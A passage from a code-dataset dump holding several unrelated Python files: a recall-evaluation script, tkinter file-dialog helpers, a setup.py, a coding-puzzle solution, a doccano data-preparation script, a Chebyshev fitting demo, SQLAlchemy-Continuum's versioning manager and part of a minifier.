shape\",i,DATABASE_PCAI_VECTORS[i].shape)\r\n\t\r\n\tfor i in range(len(QUERY_PCAI_VECTORS)):\r\n\t\tprint(\"query feature shape\",i,QUERY_PCAI_VECTORS[i].shape)\r\n\t\t\r\n\t#convert feature to target format\r\n\trecall_pcai= np.zeros(25)\r\n\trecall_pc= np.zeros(25)\r\n\trecall_img= np.zeros(25)\r\n\tcount = 0\r\n\tone_percent_recall_pcai=[]\r\n\tone_percent_recall_pc=[]\r\n\tone_percent_recall_img=[]\r\n\t\r\n\t\r\n\t#compute recall\r\n\tfor m in range(len(QUERY_SETS)):\r\n\t\tfor n in range(len(QUERY_SETS)):\r\n\t\t\tif(m==n):\r\n\t\t\t\tcontinue\r\n\t\t\tpair_recall_pcai, pair_similarity_pcai, pair_opr_pcai, one_per_data_pcai = get_recall(m, n, DATABASE_PCAI_VECTORS, QUERY_PCAI_VECTORS)\r\n\t\t\tpair_recall_pc, pair_similarity_pc, pair_opr_pc, one_per_data_pc = get_recall(m, n, DATABASE_PC_VECTORS, QUERY_PC_VECTORS)\r\n\t\t\tpair_recall_img, pair_similarity_img, pair_opr_img, one_per_data_img = get_recall(m, n, DATABASE_IMG_VECTORS, QUERY_IMG_VECTORS)\r\n\t\t\t\r\n\t\t\tif(pair_recall_pcai is None):\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\trecall_pcai+=np.array(pair_recall_pcai)\r\n\t\t\trecall_pc+=np.array(pair_recall_pc)\r\n\t\t\trecall_img+=np.array(pair_recall_img)\r\n\t\t\t\r\n\t\t\tcount+=1\r\n\t\t\tone_percent_recall_pcai.append(pair_opr_pcai)\r\n\t\t\tone_percent_recall_pc.append(pair_opr_pc)\r\n\t\t\tone_percent_recall_img.append(pair_opr_img)\r\n\r\n\trecall_pcai=recall_pcai/count\r\n\trecall_pc=recall_pc/count\r\n\trecall_img=recall_img/count\r\n\t\r\n\tprint(recall_pcai)\r\n\tprint(recall_pc)\r\n\tprint(recall_img)\r\n\t\r\n\tone_percent_recall_pcai= np.mean(one_percent_recall_pcai)\r\n\tone_percent_recall_pc= np.mean(one_percent_recall_pc)\r\n\tone_percent_recall_img= np.mean(one_percent_recall_img)\r\n\t\r\n\tprint(one_percent_recall_pcai)\r\n\tprint(one_percent_recall_pc)\r\n\tprint(one_percent_recall_img)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\t","sub_path":"compute_all_recall_stereo_centre_RobotCar_v3_trans_selected_ground.py","file_name":"compute_all_recall_stereo_centre_RobotCar_v3_trans_selected_ground.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"95651814","text":"#egversion = __doc__.split()[1]\r\n\r\n__all__ = [\r\n 'selectDir'\r\n , 'selectOpenFile'\r\n , 'selectSaveFile'\r\n ]\r\n\r\nimport sys, os, string, types, pickle,traceback\r\n\r\nfrom tkinter import *\r\nimport tkinter.filedialog as tk_FileDialog\r\nfrom io import StringIO\r\n\r\ndef write(*args):\r\n args = [str(arg) for arg in args]\r\n args = \" \".join(args)\r\n sys.stdout.write(args)\r\n \r\ndef writeln(*args):\r\n write(*args)\r\n sys.stdout.write(\"\\n\")\r\n \r\n \r\ndef dq(s):\r\n return '\"%s\"' % s\r\n\r\n#-------------------------------------------------------------------\r\n# selectOpenFile\r\n#-------------------------------------------------------------------\r\ndef selectDirectory(msg=None\r\n , title=None\r\n , default=None\r\n ):\r\n \"\"\"\r\n A dialog to get a directory name.\r\n Note that the msg argument, if specified, is ignored.\r\n\r\n Returns the name of a directory, or None if user chose to cancel.\r\n\r\n If the \"default\" argument specifies a directory name, and that\r\n directory exists, then the dialog box will start with that directory.\r\n \"\"\"\r\n title=getFileDialogTitle(msg,title) \r\n boxRoot = Tk()\r\n boxRoot.withdraw()\r\n if not default: default = None\r\n f = tk_FileDialog.askdirectory(\r\n parent=boxRoot\r\n , title=title\r\n , initialdir=default\r\n , initialfile=None\r\n ) \r\n boxRoot.destroy() \r\n if not f: return None\r\n return os.path.normpath(f)\r\n\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# getFileDialogTitle\r\n#-------------------------------------------------------------------\r\ndef getFileDialogTitle(msg\r\n , title\r\n ):\r\n if msg and title: return \"%s - %s\" % (title,msg)\r\n if msg and not title: return str(msg)\r\n if title and not msg: return str(title)\r\n return None # no message and no title\r\n\r\n#-------------------------------------------------------------------\r\n# class FileTypeObject for use with fileOpenBox\r\n#-------------------------------------------------------------------\r\nclass FileTypeObject:\r\n def __init__(self,filemask):\r\n if len(filemask) == 0:\r\n raise AssertionError('Filetype argument is empty.')\r\n \r\n self.masks = []\r\n \r\n if type(filemask) == type(\"abc\"): # a string\r\n self.initializeFromString(filemask)\r\n \r\n elif type(filemask) == type([]): # a list\r\n if len(filemask) < 2:\r\n raise AssertionError('Invalid filemask.\\n'\r\n +'List contains less than 2 members: \"%s\"' % filemask)\r\n else:\r\n self.name = filemask[-1]\r\n self.masks = list(filemask[:-1] )\r\n else:\r\n raise AssertionError('Invalid filemask: \"%s\"' % filemask)\r\n\r\n def __eq__(self,other):\r\n if self.name == other.name: return True\r\n return False\r\n \r\n def add(self,other):\r\n for mask in other.masks:\r\n if mask in self.masks: pass\r\n else: self.masks.append(mask)\r\n\r\n def toTuple(self):\r\n return (self.name,tuple(self.masks))\r\n \r\n def isAll(self):\r\n if self.name == \"All files\": return True\r\n return False\r\n \r\n def initializeFromString(self, filemask):\r\n # remove everything except the extension from the filemask\r\n self.ext = os.path.splitext(filemask)[1]\r\n if self.ext == \"\" : self.ext = \".*\"\r\n if self.ext == \".\": self.ext = \".*\"\r\n self.name = self.getName()\r\n self.masks = [\"*\" + self.ext]\r\n \r\n def getName(self):\r\n e = self.ext\r\n if e == \".*\" : return \"All files\"\r\n if e == \".txt\": return \"Text files\"\r\n if e == \".py\" : return \"Python files\"\r\n if e == \".pyc\" : return \"Python files\"\r\n if e == \".xls\": return \"Excel files\"\r\n if e.startswith(\".\"): \r\n return e[1:].upper() + \" files\"\r\n return e.upper() + \" files\"\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# selectOpenFile\r\n#-------------------------------------------------------------------\r\ndef selectOpenFile(msg=None\r\n , title=None\r\n , default=\"*\"\r\n , filetypes=None\r\n ):\r\n \"\"\"\r\n A dialog to get a file name.\r\n \r\n About the \"default\" argument\r\n ============================\r\n The \"default\" argument specifies a filepath that (normally)\r\n contains one or more wildcards.\r\n fileOpenBox will display only files that match the default filepath.\r\n If omitted, defaults to \"*\" (all files in the current directory).\r\n \r\n WINDOWS EXAMPLE::\r\n ...default=\"c:/myjunk/*.py\" \r\n will open in directory c:\\myjunk\\ and show all Python files.\r\n\r\n WINDOWS EXAMPLE::\r\n ...default=\"c:/myjunk/test*.py\" \r\n will open in directory c:\\myjunk\\ and show all Python files\r\n whose names begin with \"test\".\r\n \r\n \r\n Note that on Windows, fileOpenBox automatically changes the path\r\n separator to the Windows path separator (backslash).\r\n\r\n About the \"filetypes\" argument\r\n ==============================\r\n If specified, it should contain a list of items,\r\n where each item is either::\r\n - a string containing a filemask # e.g. \"*.txt\" \r\n - a list of strings, where all of the strings except the last one\r\n are filemasks (each beginning with \"*.\",\r\n such as \"*.txt\" for text files, \"*.py\" for Python files, etc.).\r\n and the last string contains a filetype description\r\n \r\n EXAMPLE::\r\n filetypes = [\"*.css\", [\"*.htm\", \"*.html\", \"HTML files\"] ]\r\n \r\n NOTE THAT\r\n =========\r\n\r\n If the filetypes list does not contain (\"All files\",\"*\"),\r\n it will be added.\r\n\r\n If the filetypes list does not contain a filemask that includes\r\n the extension of the \"default\" argument, it will be added.\r\n For example, if default=\"*abc.py\"\r\n and no filetypes argument was specified, then\r\n \"*.py\" will automatically be added to the filetypes argument.\r\n\r\n @rtype: string or None\r\n @return: the name of a file, or None if user chose to cancel\r\n\r\n @arg msg: the msg to be displayed.\r\n @arg title: the window title\r\n @arg default: filepath with wildcards\r\n @arg filetypes: filemasks that a user can choose, e.g. \"*.txt\"\r\n \"\"\"\r\n boxRoot = Tk()\r\n boxRoot.withdraw()\r\n\r\n initialbase, initialfile, initialdir, filetypes = fileSelectSetup(default,filetypes)\r\n\r\n #------------------------------------------------------------\r\n # if initialfile contains no wildcards; we don't want an\r\n # initial file. It won't be used anyway.\r\n # Also: if initialbase is simply \"*\", we don't want an\r\n # initialfile; it is not doing any useful work.\r\n #------------------------------------------------------------\r\n if (initialfile.find(\"*\") < 0) and (initialfile.find(\"?\") < 0):\r\n initialfile = None\r\n elif initialbase == \"*\":\r\n initialfile = None\r\n\r\n f = tk_FileDialog.askopenfilename(parent=boxRoot\r\n , title=getFileDialogTitle(msg,title) \r\n , initialdir=initialdir \r\n , initialfile=initialfile\r\n #, filetypes=[('All Files', '*.*')]\r\n #, filetypes=[('All Files', '*.*'), ('Text files', \"*.txt\")]\r\n )\r\n\r\n boxRoot.update()\r\n boxRoot.destroy() \r\n\r\n if not f: return None\r\n return os.path.normpath(f)\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# selectSaveFile\r\n#-------------------------------------------------------------------\r\ndef selectSaveFile(msg=None\r\n , title=None\r\n , default=\"\"\r\n , filetypes=None\r\n ):\r\n \"\"\" \r\n A file to get the name of a file to save.\r\n Returns the name of a file, or None if user chose to cancel.\r\n\r\n The \"default\" argument should contain a filename (i.e. the\r\n current name of the file to be saved). It may also be empty,\r\n or contain a filemask that includes wildcards.\r\n \r\n The \"filetypes\" argument works like the \"filetypes\" argument to\r\n fileOpenBox.\r\n \"\"\"\r\n\r\n boxRoot = Tk()\r\n boxRoot.withdraw()\r\n\r\n initialbase, initialfile, initialdir, filetypes = fileSelectSetup(default,filetypes)\r\n \r\n f = tk_FileDialog.asksaveasfilename(parent=boxRoot\r\n , title=getFileDialogTitle(msg,title) \r\n , initialfile=initialfile\r\n , initialdir=initialdir\r\n #, filetypes=filetypes\r\n )\r\n boxRoot.update()\r\n boxRoot.destroy() \r\n if not f: return None\r\n return os.path.normpath(f)\r\n\r\n\r\n#-------------------------------------------------------------------\r\n#\r\n# fileSelectSetup\r\n#\r\n#-------------------------------------------------------------------\r\ndef fileSelectSetup(default,filetypes): \r\n if not default: default = os.path.join(\".\",\"*\")\r\n initialdir, initialfile = os.path.split(default)\r\n if not initialdir : initialdir = \".\"\r\n if not initialfile: initialfile = \"*\"\r\n initialbase, initialext = os.path.splitext(initialfile)\r\n initialFileTypeObject = FileTypeObject(initialfile)\r\n \r\n allFileTypeObject = FileTypeObject(\"*\")\r\n ALL_filetypes_was_specified = False \r\n\r\n if not filetypes: filetypes= []\r\n filetypeObjects = []\r\n\r\n for filemask in filetypes:\r\n fto = FileTypeObject(filemask)\r\n \r\n if fto.isAll(): \r\n ALL_filetypes_was_specified = True # remember this\r\n \r\n if fto == initialFileTypeObject:\r\n initialFileTypeObject.add(fto) # add fto to initialFileTypeObject\r\n else:\r\n filetypeObjects.append(fto)\r\n\r\n #------------------------------------------------------------------\r\n # make sure that the list of filetypes includes the ALL FILES type.\r\n #------------------------------------------------------------------\r\n if ALL_filetypes_was_specified: \r\n pass\r\n elif allFileTypeObject == initialFileTypeObject:\r\n pass\r\n else:\r\n filetypeObjects.insert(0,allFileTypeObject)\r\n #------------------------------------------------------------------\r\n # Make sure that the list includes the initialFileTypeObject\r\n # in the position in the list that will make it the default.\r\n # This changed between Python version 2.5 and 2.6\r\n #------------------------------------------------------------------ \r\n if len(filetypeObjects) == 0:\r\n filetypeObjects.append(initialFileTypeObject)\r\n\r\n if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):\r\n pass\r\n else:\r\n filetypeObjects.insert(0,initialFileTypeObject) \r\n \r\n filetypes = [fto.toTuple() for fto in filetypeObjects]\r\n\r\n return initialbase, initialfile, initialdir, filetypes\r\n\r\n#-----------------------------------------------------------------------\r\n#\r\n# test/demo easygui\r\n#\r\n#-----------------------------------------------------------------------\r\ndef _dummy():\r\n pass\r\n\r\n","sub_path":"FileUtils.py","file_name":"FileUtils.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"608539995","text":"import io\nimport re\n\nfrom setuptools import find_packages, setup\n\nwith open('README.md', 'r') as fp:\n long_description = fp.read()\n\nwith io.open(\"pyrpiic/__init__.py\", \"rt\", encoding=\"utf8\") as fp:\n version = re.search(r'__version__ = \"(.*?)\"', fp.read()).group(1)\n (major_version, minor_version, revision) = version.split('.')\n\nsetup(\n name='PyRPIIC',\n version=version,\n description='Python RPI interface to low-level ICs',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='Samtec - ASH',\n author_email='samtec-ash@samtec.com',\n url='https://github.com/Samtec-ASH/pyrpiic',\n packages=find_packages(),\n python_requires='>=3.6'\n)\n","sub_path":"pypi_install_script/PyRPIIC-0.0.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"85790420","text":"#기둥과 보 설치\ndef possible(result):\n ans = True\n for x,y,a in result:\n if a == 0: #기둥인 경우\n if y == 0 or [x-1,y,1] in result or [x,y,1] in result or [x,y-1,0] in result:\n ans = True\n else:\n ans = False\n print(x,y,a)\n break\n elif a == 1: #보인 경우\n if [x,y-1,0] in result or [x+1,y-1,0] in result or ([x-1,y,1] in result and [x+1,y,1] in result):\n ans = True\n else:\n ans = False\n print(x, y, a)\n break\n return ans\n\n\ndef solution(n, build_frame):\n result = []\n for x,y,a,b in build_frame:\n tmp = [x, y, a]\n if b == 1: #설치인 경우\n result.append(tmp) #일단 설치\n if possible(result) == False: #설치된 것이 가능한 구조인지 판단\n result.remove(tmp) #불가능하다면 제거\n if b== 0: #삭제인 경우\n result.remove(tmp)\n if possible(result) == False:\n result.append(tmp)\n\n result = sorted(result, key=lambda x : (x[0], x[1]))\n return result\n\nprint(possible([[0,0,0],[0,1,1],[1,1,1],[2,0,0]]))\nprint(solution(5, [[1,0,0,1], [1,1,1,1], [2,1,0,1], [2,2,1,1], [5,0,0,1], [5,1,0,1], [4,2,1,1], [3,2,1,1]]))\nprint(solution(5, [[0,0,0,1], [2,0,0,1], [4,0,0,1], [0,1,1,1], [1,1,1,1,], [2,1,1,1], [3,1,1,1], [2,0,0,0], [1,1,1,0], [2,2,0,1]]))","sub_path":"구현/기둥과 보 설치(HHJ).py","file_name":"기둥과 보 설치(HHJ).py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"242879862","text":"import json\nimport os\nimport pickle as pkl\nimport shutil\nimport zipfile\nfrom datetime import datetime\nfrom typing import Optional\n\nfrom newsplease import NewsArticle\nfrom tqdm import tqdm\n\nfrom settings import PROJECT_PATH\n\nTEXTS_PATH = os.path.join(PROJECT_PATH, 'data', 'texts')\nUNZIPPED_DESTINATION = \"unzipped\"\nDEST_ABS_PATH = os.path.join(TEXTS_PATH, UNZIPPED_DESTINATION)\n\n\ndef datetime_to_str(date: Optional[datetime]) -> Optional[str]:\n return date.strftime(\"%m/%d/%Y, %H:%M:%S\") if date else \"\"\n\n\ndef read_single_article_group(path: str) -> NewsArticle.NewsArticle:\n \"\"\"\n Read NewsArticle object from dumped pickle file\n :param path: path to pickle\n :return: NewsArticle object\n \"\"\"\n try:\n with open(path, 'rb') as fp:\n article = pkl.load(fp)\n return article\n except (OSError, IOError) as _:\n print(\"Could not read \", path, \" Skipping\")\n\n\ndef restructurize_article_object(article_object: NewsArticle.NewsArticle, month: str,\n group_number: str) -> Optional[dict]:\n \"\"\"\n Takes the NewsArticle object and converts it to doccano-compatibile JSON Lite record.\n Namely, \"text\" key must contain text of article and \"meta\" anything we want to attach to a\n record\n :param article_object: previously read NewsArticle object\n :param month: currently processed month that will be attached to metadata\n :param group_number: id within given month, also attached to metadata\n :return: dict, restructurised article_object\n \"\"\"\n data_dict = article_object.get_dict()\n article_text = data_dict.pop('text')\n\n # sometimes a page was unavailable or link was no longer valid and in result, text is None.\n # some of these pages are available now but they constitute very small subset (ca.\n # 2300/65000) are I decided to just skip them\n if not article_text:\n return None\n\n meta_dict = {\n 'date_publish': datetime_to_str(data_dict['date_publish']),\n 'date_download': datetime_to_str(data_dict['date_download']),\n 'date_modify': datetime_to_str(data_dict['date_modify']),\n 'month': month,\n 'id': group_number,\n 'url': data_dict['url'],\n 'source_domain': data_dict['source_domain'],\n 'title': data_dict['title']\n }\n\n return {'text': article_text, 'meta': meta_dict}\n\n\ndef unzip_articles_text(destination=DEST_ABS_PATH, forced=False):\n if os.path.exists(destination):\n if forced:\n shutil.rmtree(destination)\n else:\n print(\"Nothing to be done. Destination seems populated\")\n return\n\n for _, _, files in os.walk(TEXTS_PATH):\n for month in tqdm(files, desc=\"Unzipping text articles\"):\n month_absolute_path = os.path.join(TEXTS_PATH, month)\n with zipfile.ZipFile(month_absolute_path, 'r') as fp:\n fp.extractall(destination)\n\n\ndef prepare_doccano_json(destination_filepath=\"output.json\"):\n failure_number = 0\n\n with open(destination_filepath, 'w') as fp:\n for _, subfolders, _ in os.walk(DEST_ABS_PATH):\n for month in sorted(subfolders):\n month_destination = os.path.join(DEST_ABS_PATH, month)\n for _, _, groups in os.walk(month_destination):\n for article_group in tqdm(groups, desc=\"Packing month \" + month):\n article_path = os.path.join(month_destination, article_group)\n art_obj = read_single_article_group(article_path)\n doccano_json_record = restructurize_article_object(art_obj, month,\n article_group)\n if not doccano_json_record:\n failure_number += 1\n continue\n json.dump(doccano_json_record, fp)\n fp.write(\"\\n\") # doccano requires each record be separated by line\n print(\"Done with \" + str(failure_number) + \" failures\")\n\n\nif __name__ == \"__main__\":\n unzip_articles_text(forced=True)\n prepare_doccano_json()\n","sub_path":"src/data/labeling_preparation.py","file_name":"labeling_preparation.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"94542053","text":"import numpy as np\nfrom numpy.polynomial.chebyshev import Chebyshev, chebval\nimport matplotlib.pyplot as plt\n\n#1st example\n\nnp.random.seed(0)\n\nx = np.linspace(-1, 1, 2000)\ny = np.cos(x) + 0.3*np.random.rand(2000)\np = np.polynomial.Chebyshev.fit(x, y, 90)\n\nt = np.linspace(-1, 1, 200)\nplt.plot(x, y, 'r.')\nplt.plot(t, p(t), 'k-', lw=3)\nplt.savefig(\"random.png\")\nplt.close()\n\n# 2nd example\n\nx = np.arange(0.5, 1, 1e-6)\ny = np.log10(x)\n\nfit = Chebyshev.fit(x, y, 4)\n\nplt.plot(x, y)\nplt.plot(x, fit(x), label = \"Chebyshev 4th Order Fit\", ls ='--')\nplt.legend()\nplt.savefig(\"cheby_fit.png\")\n","sub_path":"tutorial_5/chebyshev.py","file_name":"chebyshev.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130170480","text":"from contextlib import contextmanager\nfrom inflection import underscore, pluralize\nfrom copy import copy\nimport sqlalchemy as sa\nfrom sqlalchemy.orm.collections import attribute_mapped_collection\nfrom sqlalchemy.ext.associationproxy import association_proxy\nfrom sqlalchemy_utils.functions import (\n declarative_base, is_auto_assigned_date_column\n)\nfrom sqlalchemy_utils.types import TSVectorType\nfrom .fetcher import SubqueryFetcher, ValidityFetcher\nfrom .model_builder import ModelBuilder\nfrom .table_builder import TableBuilder\nfrom .relationship_builder import RelationshipBuilder\nfrom .transaction_log import (\n TransactionLogBase,\n TransactionChangesBase,\n TransactionMetaBase\n)\nfrom .unit_of_work import UnitOfWork\n\n\nclass VersioningManager(object):\n \"\"\"\n VersioningManager delegates versioning configuration operations to builder\n classes and the actual versioning to UnitOfWork class. Manager contains\n configuration options that act as defaults for all versioned classes.\n \"\"\"\n\n def __init__(\n self,\n unit_of_work_cls=UnitOfWork,\n options={}\n ):\n self.uow = unit_of_work_cls(self)\n self.reset()\n self.options = {\n 'versioning': True,\n 'base_classes': None,\n 'table_name': '%s_history',\n 'exclude': [],\n 'include': [],\n 'transaction_log_base': TransactionLogBase,\n 'transaction_column_name': 'transaction_id',\n 'end_transaction_column_name': 'end_transaction_id',\n 'operation_type_column_name': 'operation_type',\n 'relation_naming_function': lambda a: pluralize(underscore(a)),\n 'strategy': 'validity',\n 'store_data_at_delete': True,\n 'track_property_modifications': False,\n 'modified_flag_suffix': '_mod'\n }\n self.options.update(options)\n\n def fetcher(self, obj):\n if self.option(obj, 'strategy') == 'subquery':\n return SubqueryFetcher(self)\n else:\n return ValidityFetcher(self)\n\n def reset(self):\n \"\"\"\n Resets this manager's internal state.\n\n This method should be used in test cases that create models on the fly.\n Otherwise history_class_map and some other variables would be polluted\n by no more used model classes.\n \"\"\"\n self.tables = {}\n self.pending_classes = []\n self.association_tables = set([])\n self.association_history_tables = set([])\n self.history_class_map = {}\n self.uow.reset()\n\n self.metadata = None\n\n @contextmanager\n def tx_context(self, **tx_context):\n \"\"\"\n Assigns values for current transaction context. When committing\n transaction these values are assigned to transaction object attributes.\n\n :param tx_context: dictionary containing TransactionLog object\n attribute names and values\n \"\"\"\n old_tx_context = self.uow.tx_context\n self.uow.tx_context = tx_context\n yield\n self.uow.tx_context = old_tx_context\n\n @contextmanager\n def tx_meta(self, **tx_meta):\n \"\"\"\n Assigns values for current transaction meta. When committing\n transaction new TransactionMeta records are created for each key-value\n pair.\n\n :param tx_context:\n dictionary containing key-value meta attribute pairs.\n \"\"\"\n old_tx_meta = self.uow.tx_meta\n self.uow.tx_meta = tx_meta\n yield\n self.uow.tx_meta = old_tx_meta\n\n def transaction_log_factory(self):\n \"\"\"\n Creates TransactionLog class.\n \"\"\"\n class TransactionLog(\n self.declarative_base,\n self.options['transaction_log_base']\n ):\n __tablename__ = 'transaction_log'\n manager = self\n\n return TransactionLog\n\n def create_transaction_log(self):\n \"\"\"\n Creates TransactionLog class but only if it doesn't already exist in\n declarative model registry.\n \"\"\"\n if 'TransactionLog' not in self.declarative_base._decl_class_registry:\n return self.transaction_log_factory()\n return self.declarative_base._decl_class_registry['TransactionLog']\n\n def transaction_changes_factory(self):\n \"\"\"\n Creates TransactionChanges class.\n \"\"\"\n class TransactionChanges(\n self.declarative_base,\n TransactionChangesBase\n ):\n __tablename__ = 'transaction_changes'\n\n TransactionChanges.transaction_log = sa.orm.relationship(\n self.transaction_log_cls,\n backref=sa.orm.backref(\n 'changes',\n ),\n primaryjoin=(\n '%s.id == TransactionChanges.transaction_id' %\n self.transaction_log_cls.__name__\n ),\n foreign_keys=[TransactionChanges.transaction_id]\n )\n return TransactionChanges\n\n def create_transaction_changes(self):\n \"\"\"\n Creates TransactionChanges class but only if it doesn't already exist\n in declarative model registry.\n \"\"\"\n if (\n 'TransactionChanges' not in\n self.declarative_base._decl_class_registry\n ):\n return self.transaction_changes_factory()\n return self.declarative_base._decl_class_registry['TransactionChanges']\n\n def transaction_meta_factory(self):\n \"\"\"\n Creates TransactionMeta class.\n \"\"\"\n class TransactionMeta(\n self.declarative_base,\n TransactionMetaBase\n ):\n __tablename__ = 'transaction_meta'\n\n TransactionMeta.transaction_log = sa.orm.relationship(\n self.transaction_log_cls,\n backref=sa.orm.backref(\n 'meta_relation',\n collection_class=attribute_mapped_collection('key')\n ),\n primaryjoin=(\n '%s.id == TransactionMeta.transaction_id' %\n self.transaction_log_cls.__name__\n ),\n foreign_keys=[TransactionMeta.transaction_id]\n )\n\n self.transaction_log_cls.meta = association_proxy(\n 'meta_relation',\n 'value',\n creator=lambda key, value: TransactionMeta(key=key, value=value)\n )\n\n return TransactionMeta\n\n def create_transaction_meta(self):\n \"\"\"\n Creates TransactionMeta class but only if it doesn't already exist\n in declarative model registry.\n \"\"\"\n if (\n 'TransactionMeta' not in\n self.declarative_base._decl_class_registry\n ):\n return self.transaction_meta_factory()\n return self.declarative_base._decl_class_registry['TransactionMeta']\n\n def build_tables(self):\n \"\"\"\n Build tables for history models based on classes that were collected\n during class instrumentation process.\n \"\"\"\n for cls in self.pending_classes:\n if not self.option(cls, 'versioning'):\n continue\n\n inherited_table = None\n for class_ in self.tables:\n if (issubclass(cls, class_) and\n cls.__table__ == class_.__table__):\n inherited_table = self.tables[class_]\n break\n\n builder = TableBuilder(\n self,\n cls.__table__,\n model=cls\n )\n if inherited_table is not None:\n self.tables[class_] = builder(inherited_table)\n else:\n table = builder()\n self.tables[cls] = table\n\n def closest_matching_table(self, model):\n \"\"\"\n Returns the closest matching table from the generated tables dictionary\n for given model. First tries to fetch an exact match for given model.\n If no table was found then tries to match given model as a subclass.\n\n :param model: SQLAlchemy declarative model class.\n \"\"\"\n if model in self.tables:\n return self.tables[model]\n for cls in self.tables:\n if issubclass(model, cls):\n return self.tables[cls]\n\n def build_models(self):\n \"\"\"\n Build declarative history models based on classes that were collected\n during class instrumentation process.\n \"\"\"\n if self.pending_classes:\n cls = self.pending_classes[0]\n self.declarative_base = declarative_base(cls)\n self.transaction_log_cls = self.create_transaction_log()\n self.transaction_changes_cls = self.create_transaction_changes()\n self.transaction_meta_cls = self.create_transaction_meta()\n\n for cls in self.pending_classes:\n if not self.option(cls, 'versioning'):\n continue\n\n table = self.closest_matching_table(cls)\n if table is not None:\n builder = ModelBuilder(self, cls)\n builder(\n table,\n self.transaction_log_cls,\n self.transaction_changes_cls\n )\n\n def build_relationships(self, history_classes):\n \"\"\"\n Builds relationships for all history classes.\n\n :param history_classes: list of generated history classes\n \"\"\"\n for cls in history_classes:\n if not self.option(cls, 'versioning'):\n continue\n\n for prop in cls.__mapper__.iterate_properties:\n if prop.key == 'versions':\n continue\n builder = RelationshipBuilder(self, cls, prop)\n builder()\n\n def is_excluded_column(self, model, column):\n \"\"\"\n Returns whether or not given column of given model is excluded from\n the associated history model.\n\n :param model: SQLAlchemy declarative model object.\n :param column: SQLAlchemy Column object.\n \"\"\"\n if column.name in self.option(model, 'include'):\n return False\n return (\n column.name in self.option(model, 'exclude')\n or\n is_auto_assigned_date_column(column)\n or\n isinstance(column.type, TSVectorType)\n )\n\n def option(self, model, name):\n \"\"\"\n Returns the option value for given model. If the option is not found\n from given model falls back to default values of this manager object.\n If the option is not found from this manager object either this method\n throws a KeyError.\n\n :param model: SQLAlchemy declarative object\n :param name: name of the versioning option\n \"\"\"\n try:\n return model.__versioned__[name]\n except (AttributeError, KeyError):\n return self.options[name]\n\n def instrument_versioned_classes(self, mapper, cls):\n \"\"\"\n Collects all versioned classes and adds them into pending_classes list.\n\n :mapper mapper: SQLAlchemy mapper object\n :cls cls: SQLAlchemy declarative class\n \"\"\"\n if not self.options['versioning']:\n return\n\n if hasattr(cls, '__versioned__'):\n if (not cls.__versioned__.get('class')\n and cls not in self.pending_classes):\n self.pending_classes.append(cls)\n self.metadata = cls.metadata\n\n def apply_class_configuration_listeners(self, mapper):\n \"\"\"\n Applies class configuration listeners for given mapper.\n\n The listener work in two phases:\n\n 1. Class instrumentation phase\n The first listeners listens to class instrumentation event and\n handles the collecting of versioned models and adds them to\n the pending_classes list.\n 2. After class configuration phase\n The second listener listens to after class configuration event and\n handles the actual history model generation based on list that\n was collected during class instrumenation phase.\n\n :param mapper:\n SQLAlchemy mapper to apply the class configuration listeners to\n \"\"\"\n sa.event.listen(\n mapper, 'instrument_class', self.instrument_versioned_classes\n )\n sa.event.listen(\n mapper, 'after_configured', self.configure_versioned_classes\n )\n\n def configure_versioned_classes(self):\n \"\"\"\n Configures all versioned classes that were collected during\n instrumentation process. The configuration has 4 steps:\n\n 1. Build tables for history models.\n 2. Build the actual history model declarative classes.\n 3. Build relationships between these models.\n 4. Empty pending_classes list so that consecutive mapper configuration\n does not create multiple history classes\n 5. Assign all versioned attributes to use active history.\n \"\"\"\n if not self.options['versioning']:\n return\n\n self.build_tables()\n self.build_models()\n\n # Create copy of all pending versioned classes so that we can inspect\n # them later when creating relationships.\n pending_copy = copy(self.pending_classes)\n self.pending_classes = []\n self.build_relationships(pending_copy)\n\n for cls in pending_copy:\n # set the \"active_history\" flag\n for prop in cls.__mapper__.iterate_properties:\n getattr(cls, prop.key).impl.active_history = True\n","sub_path":"sqlalchemy_continuum/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":13636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47177020","text":"from re import search, sub\nfrom glob import glob\nfrom os import makedirs\nfrom os.path import exists, basename\n\ndef minifyHtml(dir, out):\n \n basePath = 'views'\n\n path = '%s/%s/%s' % (dir, basePath, '**/*.html')\n \n for filePath in glob(path, recursive=True):\n \n with open(filePath, 'r') as file:\n \n outPath = '%s/%s%s' % (out, basePath, filePath.split(basePath)[1])\n \n if not exists(outPath.replace(basename(outPath), \"\")):\n makedirs(outPath.replace(basename(outPath), \"\"))\n \n \n with open(outPath, 'w+') as outFile:\n for line in file:\n outFile.write(sub('[\\\\n\\\\t]', \"\", line.strip()))\n \n \ndef minifyCss(dir, out):\n \n basePath = 'css'\n \n path = '%s/%s/%s' % (dir, basePath, '**/*.css')\n \n styles = \"\";\n \n for filePath in glob(path, recursive=True):\n \n with open(filePath, 'r') as file:\n \n for line in file:\n styles += sub('[\\\\n\\\\t]', \"\", line.strip())\n \n \n \n with open(out, 'w+') as outFile:\n outFile.write(styles)","sub_path":"client/minifier/minifier.py","file_name":"minifier.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"547214030","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport 